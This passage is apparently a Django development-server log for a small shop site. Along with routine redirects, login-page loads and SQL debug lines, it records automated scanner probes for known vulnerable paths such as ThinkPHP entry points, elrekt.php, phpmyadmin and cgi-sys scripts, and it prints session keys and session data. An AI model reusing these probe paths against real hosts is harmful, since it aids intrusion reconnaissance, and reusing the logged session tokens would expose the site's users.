'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 19, 20, 34, 11, 764017, tzinfo=)) [05/Jan/2020 20:34:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [05/Jan/2020 20:35:40] "GET / HTTP/1.0" 302 0 [05/Jan/2020 20:40:43] "GET / HTTP/1.0" 302 0 [05/Jan/2020 20:46:38] "GET / HTTP/1.0" 302 0 [05/Jan/2020 20:47:20] "GET / HTTP/1.0" 302 0 [05/Jan/2020 20:51:41] "GET / HTTP/1.0" 302 0 [05/Jan/2020 21:00:02] "GET / HTTP/1.0" 302 0 [05/Jan/2020 21:10:04] "GET / HTTP/1.0" 302 0 [05/Jan/2020 21:15:06] "GET / HTTP/1.0" 302 0 [05/Jan/2020 21:20:09] "GET / HTTP/1.0" 302 0 [05/Jan/2020 21:25:12] "GET / HTTP/1.0" 302 0 [05/Jan/2020 21:30:15] "GET / HTTP/1.0" 302 0 [05/Jan/2020 21:35:18] "GET / HTTP/1.0" 302 0 [05/Jan/2020 21:40:20] "GET / HTTP/1.0" 302 0 [05/Jan/2020 21:45:23] "GET / HTTP/1.0" 302 0 [05/Jan/2020 21:50:26] "GET / HTTP/1.0" 302 0 [05/Jan/2020 21:55:29] "GET / HTTP/1.0" 302 0 [05/Jan/2020 22:05:03] "GET / HTTP/1.0" 302 0 [05/Jan/2020 22:10:06] "GET / HTTP/1.0" 302 0 [05/Jan/2020 22:15:09] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [05/Jan/2020 22:17:06] "GET /robots.txt HTTP/1.0" 404 6341 [05/Jan/2020 22:17:11] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-05 22:19:29,164 utils 27361 140408443102976 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'xsyd'; args=('xsyd',) Not Found: /xsyd/ [05/Jan/2020 22:19:29] "GET /xsyd/ HTTP/1.0" 404 1725 [05/Jan/2020 22:20:11] "GET / HTTP/1.0" 302 0 [05/Jan/2020 22:25:14] "GET / HTTP/1.0" 302 0 [05/Jan/2020 22:30:19] "GET / HTTP/1.0" 302 0 [05/Jan/2020 22:35:22] "GET / HTTP/1.0" 302 0 [05/Jan/2020 22:40:25] "GET / HTTP/1.0" 302 0 [05/Jan/2020 22:45:28] "GET / HTTP/1.0" 302 0 [05/Jan/2020 22:50:30] "GET / HTTP/1.0" 302 0 [05/Jan/2020 22:58:22] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:05:03] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:10:05] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:15:08] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:20:11] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:25:13] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [05/Jan/2020 23:30:16] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:35:19] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:38:12] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:39:23] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:40:35] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:45:38] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:50:41] "GET / HTTP/1.0" 302 0 [05/Jan/2020 23:55:44] "GET / HTTP/1.0" 302 0 [06/Jan/2020 00:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 00:10:05] "GET / HTTP/1.0" 302 0 [06/Jan/2020 00:15:08] "GET / HTTP/1.0" 302 0 [06/Jan/2020 00:19:01] "GET / HTTP/1.0" 302 0 [06/Jan/2020 00:20:11] "GET / HTTP/1.0" 302 0 [06/Jan/2020 00:29:58] "GET / HTTP/1.0" 302 0 [06/Jan/2020 00:35:01] "GET / HTTP/1.0" 302 0 [06/Jan/2020 00:40:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 00:45:06] "GET / HTTP/1.0" 302 0 [06/Jan/2020 00:50:07] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [06/Jan/2020 00:52:08] "GET /TP/public/index.php HTTP/1.0" 404 6367 Not Found: /TP/index.php [06/Jan/2020 00:52:09] "GET /TP/index.php HTTP/1.0" 404 6346 Not Found: /thinkphp/html/public/index.php [06/Jan/2020 00:52:09] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6400 Not Found: /html/public/index.php [06/Jan/2020 00:52:09] "GET /html/public/index.php HTTP/1.0" 404 6373 Not Found: /public/index.php [06/Jan/2020 00:52:10] "GET /public/index.php HTTP/1.0" 404 6358 Not Found: /TP/html/public/index.php [06/Jan/2020 00:52:10] "GET /TP/html/public/index.php HTTP/1.0" 404 6382 Not Found: /elrekt.php [06/Jan/2020 00:52:11] "GET /elrekt.php HTTP/1.0" 404 6340 Not Found: /index.php [06/Jan/2020 00:52:11] "GET /index.php HTTP/1.0" 404 6337 [06/Jan/2020 00:52:12] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-06 00:52:12,711 utils 27361 140408443102976 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '201jkg3hah8vpwd5ssksb8wg1dwbdty3' LIMIT 1; args=('201jkg3hah8vpwd5ssksb8wg1dwbdty3',) DEBUG 2020-01-06 00:52:12,715 utils 27361 140408443102976 (0.003) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('201jkg3hah8vpwd5ssksb8wg1dwbdty3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-20T00:52:12.712510+00:00'::timestamptz); args=('201jkg3hah8vpwd5ssksb8wg1dwbdty3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 20, 0, 52, 12, 712510, tzinfo=)) [06/Jan/2020 00:52:12] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Jan/2020 00:55:10] "GET / HTTP/1.0" 302 0 [06/Jan/2020 00:57:24] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:05:02] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:09:04] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:10:05] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:15:07] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:18:11] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:20:10] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:24:21] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:25:13] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:30:16] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:35:19] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:40:22] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:45:25] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:50:28] "GET / HTTP/1.0" 302 0 [06/Jan/2020 01:55:30] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [06/Jan/2020 01:56:48] "GET /proxy.php HTTP/1.0" 404 6346 [06/Jan/2020 02:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 02:10:27] "GET / HTTP/1.0" 302 0 Not Found: /ShowAuthor.asp [06/Jan/2020 02:11:17] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%EF%BF%BD%EF%BF%BD%D0%A9%EF%BF%BD%EF%BF%BD%EF%BF%BD%CB%BE%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%D0%B5%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD HTTP/1.0" 404 6600 [06/Jan/2020 02:16:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 02:21:06] "GET / HTTP/1.0" 302 0 [06/Jan/2020 02:29:42] "GET / HTTP/1.0" 302 0 [06/Jan/2020 02:37:04] "GET / HTTP/1.0" 302 0 [06/Jan/2020 02:42:10] "GET / HTTP/1.0" 302 0 [06/Jan/2020 02:47:13] "GET / HTTP/1.0" 302 0 [06/Jan/2020 02:52:16] "GET / HTTP/1.0" 302 0 [06/Jan/2020 02:57:19] "GET / HTTP/1.0" 302 0 [06/Jan/2020 03:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 03:12:41] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [06/Jan/2020 03:15:48] "GET /proxy.php HTTP/1.0" 404 6342 [06/Jan/2020 03:17:44] "GET / HTTP/1.0" 302 0 [06/Jan/2020 03:22:42] "GET / HTTP/1.0" 302 0 [06/Jan/2020 03:22:46] "GET / HTTP/1.0" 302 0 [06/Jan/2020 03:27:48] "GET / HTTP/1.0" 302 0 [06/Jan/2020 03:32:51] "GET / HTTP/1.0" 302 0 [06/Jan/2020 03:37:54] "GET / HTTP/1.0" 302 0 [06/Jan/2020 03:41:12] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-06 03:41:12,311 utils 27361 140408443102976 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 't3eve3n17cf2qt1e51uogzxb8wvggo4a' LIMIT 1; args=('t3eve3n17cf2qt1e51uogzxb8wvggo4a',) DEBUG 2020-01-06 03:41:12,313 utils 27361 140408443102976 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('t3eve3n17cf2qt1e51uogzxb8wvggo4a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-20T03:41:12.311516+00:00'::timestamptz); args=('t3eve3n17cf2qt1e51uogzxb8wvggo4a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 20, 3, 41, 12, 311516, tzinfo=)) [06/Jan/2020 03:41:12] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Jan/2020 03:42:56] "GET / HTTP/1.0" 302 0 [06/Jan/2020 03:48:00] "GET / HTTP/1.0" 302 0 [06/Jan/2020 03:53:02] "GET / HTTP/1.0" 302 0 Not Found: /index.asp [06/Jan/2020 03:54:35] "GET /index.asp HTTP/1.0" 404 6338 [06/Jan/2020 03:55:57] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-06 03:55:58,235 utils 27361 140408443102976 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 't3gb7ziptgroozt5ixzjaiqlepx0k7sw' LIMIT 1; args=('t3gb7ziptgroozt5ixzjaiqlepx0k7sw',) DEBUG 2020-01-06 03:55:58,239 utils 27361 140408443102976 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('t3gb7ziptgroozt5ixzjaiqlepx0k7sw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-20T03:55:58.236526+00:00'::timestamptz); args=('t3gb7ziptgroozt5ixzjaiqlepx0k7sw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 20, 3, 55, 58, 236526, tzinfo=)) [06/Jan/2020 03:55:58] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Jan/2020 03:58:05] "GET / HTTP/1.0" 302 0 [06/Jan/2020 04:01:58] "GET / HTTP/1.0" 302 0 [06/Jan/2020 04:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 04:12:52] "GET / HTTP/1.0" 302 0 [06/Jan/2020 04:20:24] "GET / HTTP/1.0" 302 0 [06/Jan/2020 04:25:27] "GET / HTTP/1.0" 302 0 [06/Jan/2020 04:30:29] "GET / HTTP/1.0" 302 0 [06/Jan/2020 04:35:32] "GET / HTTP/1.0" 302 0 [06/Jan/2020 04:40:34] "GET / HTTP/1.0" 302 0 [06/Jan/2020 04:45:37] "GET / HTTP/1.0" 302 0 [06/Jan/2020 04:50:40] "GET / HTTP/1.0" 302 0 [06/Jan/2020 04:55:43] "GET / HTTP/1.0" 302 0 Not Found: /index.php [06/Jan/2020 04:57:47] "GET /index.php HTTP/1.0" 404 6337 Not Found: /phpmyadmin/index.php [06/Jan/2020 04:57:47] "GET /phpmyadmin/index.php HTTP/1.0" 404 6370 [06/Jan/2020 05:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 05:10:05] "GET / HTTP/1.0" 302 0 [06/Jan/2020 05:15:08] "GET / HTTP/1.0" 302 0 [06/Jan/2020 05:20:11] "GET / HTTP/1.0" 302 0 [06/Jan/2020 05:26:31] "GET / HTTP/1.0" 302 0 [06/Jan/2020 05:31:34] "GET / HTTP/1.0" 302 0 [06/Jan/2020 05:36:37] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [06/Jan/2020 05:40:36] "GET /robots.txt HTTP/1.0" 404 6341 [06/Jan/2020 05:40:56] "GET / HTTP/1.0" 302 0 [06/Jan/2020 05:41:26] "GET / HTTP/1.0" 302 0 [06/Jan/2020 05:41:40] "GET / HTTP/1.0" 302 0 [06/Jan/2020 05:46:42] "GET / HTTP/1.0" 302 0 [06/Jan/2020 05:51:45] "GET / HTTP/1.0" 302 0 [06/Jan/2020 06:00:02] "GET / HTTP/1.0" 302 0 [06/Jan/2020 06:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 06:07:34] "GET / HTTP/1.0" 302 0 [06/Jan/2020 06:10:06] "GET / HTTP/1.0" 302 0 [06/Jan/2020 06:18:25] "GET / HTTP/1.0" 302 0 [06/Jan/2020 06:23:28] "GET / HTTP/1.0" 302 0 [06/Jan/2020 06:28:46] "GET / HTTP/1.0" 302 0 [06/Jan/2020 06:33:49] "GET / HTTP/1.0" 302 0 [06/Jan/2020 06:38:51] "GET / HTTP/1.0" 302 0 [06/Jan/2020 06:43:54] "GET / HTTP/1.0" 302 0 [06/Jan/2020 06:48:57] "GET / HTTP/1.0" 302 0 [06/Jan/2020 06:53:59] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:00:01] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Jan/2020 07:10:05] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:15:08] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:20:11] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:22:26] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Jan/2020 07:25:14] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:30:17] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:35:19] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:40:22] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:45:24] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:50:27] "GET / HTTP/1.0" 302 0 [06/Jan/2020 07:55:30] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:05:02] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:10:05] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:15:08] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:20:11] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:25:14] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:30:16] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:35:19] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:36:55] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:40:22] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:45:24] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:50:27] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:57:13] "GET / HTTP/1.0" 302 0 [06/Jan/2020 08:57:44] "GET / HTTP/1.0" 302 0 [06/Jan/2020 09:02:19] "GET / HTTP/1.0" 302 0 [06/Jan/2020 09:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Jan/2020 09:10:04] "GET / HTTP/1.0" 302 0 [06/Jan/2020 09:15:13] "GET / HTTP/1.0" 302 0 [06/Jan/2020 09:20:24] "GET / HTTP/1.0" 302 0 [06/Jan/2020 09:24:07] "GET / HTTP/1.0" 302 0 [06/Jan/2020 09:25:27] "GET / HTTP/1.0" 302 0 [06/Jan/2020 09:30:29] "GET / HTTP/1.0" 302 0 [06/Jan/2020 09:39:43] "GET / HTTP/1.0" 302 0 [06/Jan/2020 09:44:45] "GET / HTTP/1.0" 302 0 [06/Jan/2020 09:49:48] "GET / HTTP/1.0" 302 0 [06/Jan/2020 09:54:51] "GET / HTTP/1.0" 302 0 [06/Jan/2020 09:59:54] "GET / HTTP/1.0" 302 0 [06/Jan/2020 10:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 10:10:06] "GET / HTTP/1.0" 302 0 [06/Jan/2020 10:15:09] "GET / HTTP/1.0" 302 0 [06/Jan/2020 10:20:12] "GET / HTTP/1.0" 302 0 [06/Jan/2020 10:25:15] "GET / HTTP/1.0" 302 0 [06/Jan/2020 10:30:18] "GET / HTTP/1.0" 302 0 [06/Jan/2020 10:35:21] "GET / HTTP/1.0" 302 0 [06/Jan/2020 10:40:24] "GET / HTTP/1.0" 302 0 [06/Jan/2020 10:45:27] "GET / HTTP/1.0" 302 0 [06/Jan/2020 10:49:57] "GET / HTTP/1.0" 302 0 [06/Jan/2020 10:50:30] "GET / HTTP/1.0" 302 0 [06/Jan/2020 10:55:33] "GET / HTTP/1.0" 302 0 [06/Jan/2020 11:03:33] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-06 11:03:33,622 utils 27361 140408443102976 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'aem293zej240048teynkzvdpjz417bb6' LIMIT 1; args=('aem293zej240048teynkzvdpjz417bb6',) DEBUG 2020-01-06 11:03:33,625 utils 27361 140408443102976 (0.003) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('aem293zej240048teynkzvdpjz417bb6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-20T11:03:33.622650+00:00'::timestamptz); args=('aem293zej240048teynkzvdpjz417bb6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 20, 11, 3, 33, 622650, tzinfo=)) [06/Jan/2020 11:03:33] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Jan/2020 11:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 11:10:05] "GET / HTTP/1.0" 302 0 [06/Jan/2020 11:15:08] "GET / HTTP/1.0" 302 0 Not Found: //cgi-sys/realsignup.cgi [06/Jan/2020 11:15:43] "GET //cgi-sys/realsignup.cgi HTTP/1.0" 404 6379 [06/Jan/2020 11:20:11] "GET / HTTP/1.0" 302 0 [06/Jan/2020 11:25:14] "GET / HTTP/1.0" 302 0 [06/Jan/2020 11:30:17] "GET / HTTP/1.0" 302 0 [06/Jan/2020 11:35:20] "GET / HTTP/1.0" 302 0 [06/Jan/2020 11:40:22] "GET / HTTP/1.0" 302 0 [06/Jan/2020 11:45:25] "GET / HTTP/1.0" 302 0 [06/Jan/2020 11:51:29] "GET / HTTP/1.0" 302 0 [06/Jan/2020 11:56:32] "GET / HTTP/1.0" 302 0 [06/Jan/2020 12:03:40] "GET / HTTP/1.0" 302 0 [06/Jan/2020 12:10:04] "GET / HTTP/1.0" 302 0 [06/Jan/2020 12:15:06] "GET / HTTP/1.0" 302 0 [06/Jan/2020 12:20:09] "GET / HTTP/1.0" 302 0 [06/Jan/2020 12:22:18] "GET / HTTP/1.0" 302 0 [06/Jan/2020 12:25:12] "GET / HTTP/1.0" 302 0 [06/Jan/2020 12:30:14] "GET / HTTP/1.0" 302 0 [06/Jan/2020 12:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Jan/2020 12:35:17] "GET / HTTP/1.0" 302 0 [06/Jan/2020 12:40:20] "GET / HTTP/1.0" 302 0 [06/Jan/2020 12:45:22] "GET / HTTP/1.0" 302 0 [06/Jan/2020 12:50:25] "GET / HTTP/1.0" 302 0 [06/Jan/2020 12:57:02] "GET / HTTP/1.0" 302 0 [06/Jan/2020 13:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 13:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Jan/2020 13:10:06] "GET / HTTP/1.0" 302 0 [06/Jan/2020 13:15:08] "GET / HTTP/1.0" 302 0 [06/Jan/2020 13:20:11] "GET / HTTP/1.0" 302 0 [06/Jan/2020 13:25:14] "GET / HTTP/1.0" 302 0 [06/Jan/2020 13:30:14] "GET / HTTP/1.0" 302 0 [06/Jan/2020 13:30:17] "GET / HTTP/1.0" 302 0 [06/Jan/2020 13:35:20] "GET / HTTP/1.0" 302 0 [06/Jan/2020 13:40:23] "GET / HTTP/1.0" 302 0 [06/Jan/2020 13:45:26] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-06 13:50:53,686 utils 27361 140408443102976 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'jsyd'; args=('jsyd',) Not Found: /jsyd/ [06/Jan/2020 13:50:53] "GET /jsyd/ HTTP/1.0" 404 1725 [06/Jan/2020 13:51:53] "GET / HTTP/1.0" 302 0 [06/Jan/2020 13:56:55] "GET / HTTP/1.0" 302 0 [06/Jan/2020 14:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 14:14:00] "GET / HTTP/1.0" 302 0 [06/Jan/2020 14:19:02] "GET / HTTP/1.0" 302 0 [06/Jan/2020 14:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Jan/2020 14:24:05] "GET / HTTP/1.0" 302 0 [06/Jan/2020 14:29:07] "GET / HTTP/1.0" 302 0 [06/Jan/2020 14:34:10] "GET / HTTP/1.0" 302 0 [06/Jan/2020 14:39:13] "GET / HTTP/1.0" 302 0 [06/Jan/2020 14:48:24] "GET / HTTP/1.0" 302 0 [06/Jan/2020 14:53:27] "GET / HTTP/1.0" 302 0 [06/Jan/2020 14:58:30] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:05:03] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:10:05] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:15:08] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:20:11] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:25:14] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:30:16] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:35:20] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:40:25] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:45:28] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:49:02] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:49:02] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:50:30] "GET / HTTP/1.0" 302 0 [06/Jan/2020 15:55:33] "GET / HTTP/1.0" 302 0 [06/Jan/2020 16:01:14] "GET / HTTP/1.0" 302 0 [06/Jan/2020 16:05:57] "GET / HTTP/1.0" 302 0 [06/Jan/2020 16:08:20] "GET / HTTP/1.0" 302 0 [06/Jan/2020 16:10:02] "GET /whm-server-status HTTP/1.0" 301 0 [06/Jan/2020 16:14:02] "GET / HTTP/1.0" 302 0 [06/Jan/2020 16:19:05] "GET / HTTP/1.0" 302 0 [06/Jan/2020 16:24:08] "GET / HTTP/1.0" 302 0 [06/Jan/2020 16:29:10] "GET / HTTP/1.0" 302 0 [06/Jan/2020 16:34:13] "GET / HTTP/1.0" 302 0 [06/Jan/2020 16:39:15] "GET / HTTP/1.0" 302 0 [06/Jan/2020 16:44:18] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [06/Jan/2020 16:47:21] "GET /TP/public/index.php HTTP/1.0" 404 6367 Not Found: /TP/index.php [06/Jan/2020 16:47:22] "GET /TP/index.php HTTP/1.0" 404 6346 Not Found: /thinkphp/html/public/index.php [06/Jan/2020 16:47:24] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6400 Not Found: /html/public/index.php [06/Jan/2020 16:47:25] "GET /html/public/index.php HTTP/1.0" 404 6373 Not Found: /public/index.php [06/Jan/2020 16:47:26] "GET /public/index.php HTTP/1.0" 404 6358 Not Found: /TP/html/public/index.php [06/Jan/2020 16:47:26] "GET /TP/html/public/index.php HTTP/1.0" 404 6382 Not Found: /elrekt.php [06/Jan/2020 16:47:26] "GET /elrekt.php HTTP/1.0" 404 6340 Not Found: /index.php [06/Jan/2020 16:47:27] "GET /index.php HTTP/1.0" 404 6337 [06/Jan/2020 16:47:28] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-06 16:47:29,139 utils 27361 140408453592832 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zb3iqrkjxrxolduqolcbnbyqt9lqyyaf' LIMIT 1; args=('zb3iqrkjxrxolduqolcbnbyqt9lqyyaf',) DEBUG 2020-01-06 16:47:29,142 utils 27361 140408453592832 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zb3iqrkjxrxolduqolcbnbyqt9lqyyaf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-20T16:47:29.140016+00:00'::timestamptz); args=('zb3iqrkjxrxolduqolcbnbyqt9lqyyaf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 20, 16, 47, 29, 140016, tzinfo=)) [06/Jan/2020 16:47:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Jan/2020 16:49:21] "GET / HTTP/1.0" 302 0 [06/Jan/2020 16:54:24] "GET / HTTP/1.0" 302 0 [06/Jan/2020 16:59:26] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [06/Jan/2020 17:03:27] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: //bszs.conac.cn/sitename [06/Jan/2020 17:03:30] "GET //bszs.conac.cn/sitename?method=show&id=0D9923CEDC7F1FD0E053022819AC1512 HTTP/1.0" 404 6432 Not Found: /Category_52/Index.aspx [06/Jan/2020 17:03:32] "GET /Category_52/Index.aspx HTTP/1.0" 404 6377 Not Found: /Category_8/index.aspx [06/Jan/2020 17:03:34] "GET /Category_8/index.aspx HTTP/1.0" 404 6374 [06/Jan/2020 17:03:36] "GET /Guestbook HTTP/1.0" 301 0 DEBUG 2020-01-06 17:03:40,778 utils 27361 140408453592832 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Guestbook'; args=('Guestbook',) Not Found: /Guestbook/ [06/Jan/2020 17:03:40] "GET /Guestbook/ HTTP/1.0" 404 1735 Not Found: /Reg/User_Reg.asp [06/Jan/2020 17:03:44] "GET /Reg/User_Reg.asp HTTP/1.0" 404 6359 Not Found: /Reg/bbs.htm [06/Jan/2020 17:03:48] "GET /Reg/bbs.htm HTTP/1.0" 404 6344 Not Found: /Sdms/ScoreQuery.asp [06/Jan/2020 17:03:51] "GET /Sdms/ScoreQuery.asp HTTP/1.0" 404 6368 Not Found: /ShowAuthor.asp [06/Jan/2020 17:03:54] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%C2%B2%C3%94%C3%84%C3%8F%C2%BD%C3%8C%C3%93%C3%BD%C3%8D%C3%B8 HTTP/1.0" 404 6444 Not Found: /ShowAuthor.asp [06/Jan/2020 17:03:56] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%C3%87%C3%85%C2%B6%C3%95%C2%B8%C3%9F%C2%BC%C2%B6%C3%96%C3%90%C3%91%C2%A7%C2%BD%C3%8C%C3%8E%C3%B1%C2%B4%C2%A6 HTTP/1.0" 404 6492 Not Found: /ShowAuthor.asp [06/Jan/2020 17:04:00] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%C3%87%C3%85%C2%B6%C3%95%C2%B8%C3%9F%C3%96%C3%90%C2%BD%C3%8C%C3%8E%C3%B1%C2%B4%C2%A6 HTTP/1.0" 404 6468 Not Found: /ShowAuthor.asp [06/Jan/2020 17:04:03] "GET 